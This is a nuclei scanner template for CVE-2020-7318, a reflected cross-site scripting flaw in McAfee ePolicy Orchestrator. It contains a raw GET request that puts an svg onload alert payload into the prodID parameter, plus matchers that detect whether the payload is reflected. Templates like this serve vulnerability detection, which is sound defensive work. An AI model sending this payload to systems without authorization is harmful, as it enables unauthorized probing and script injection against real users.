nuclei-templates/http/cves/2020/CVE-2020-7318.yaml

id: CVE-2020-7318

info:
  name: McAfee ePolicy Orchestrator <5.10.9 Update 9 - Cross-Site Scripting
  author: dwisiswant0
  severity: medium
  description: |
    McAfee ePolicy Orchestrator before 5.10.9 Update 9 is vulnerable to a cross-site scripting vulnerability that allows administrators to inject arbitrary web script or HTML via multiple parameters where the administrator's entries were not correctly sanitized.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or unauthorized actions.
  remediation: |
    Upgrade to McAfee ePolicy Orchestrator version 5.10.9 Update 9 or later to mitigate this vulnerability.
  # The vendor advisory (SB10332) was listed a second time under remediation in the
  # blame view; a duplicate "reference" key is invalid YAML, so it is kept once here.
  reference:
    - https://swarm.ptsecurity.com/vulnerabilities-in-mcafee-epolicy-orchestrator/
    - https://kc.mcafee.com/corporate/index?page=content&id=SB10332
    - https://nvd.nist.gov/vuln/detail/CVE-2020-7318
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 4.3
    cve-id: CVE-2020-7318
    cwe-id: CWE-79
    epss-score: 0.00065
    epss-percentile: 0.27029
    cpe: cpe:2.3:a:mcafee:epolicy_orchestrator:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: mcafee
    product: epolicy_orchestrator
  tags: cve,cve2020,xss,mcafee

http:
  # Single raw request; {{Hostname}} is substituted by nuclei with the target host.
  # The prodID parameter carries a URL-encoded '"><svg/onload=alert(document.domain)> probe.
  - raw:
      - |
        GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}
        Connection: close

    # All three matchers must hit: an HTML response, the probe reflected unencoded
    # next to the expected page text, and HTTP 200.
    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "text/html"

      - type: word
        part: body
        words:
          - "Policy Name"
          - "'\"><svg/onload=alert(document.domain)>"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100faa284d4b06f356396d8eda1bbc7e0c575dee731484144ead94fb124061a10b90220765eff51eae247034142d964e680d1ea99d4eec6f0baf29b3d98e9ecdbec1f73:922c64590222798bb761d5b6d8e72950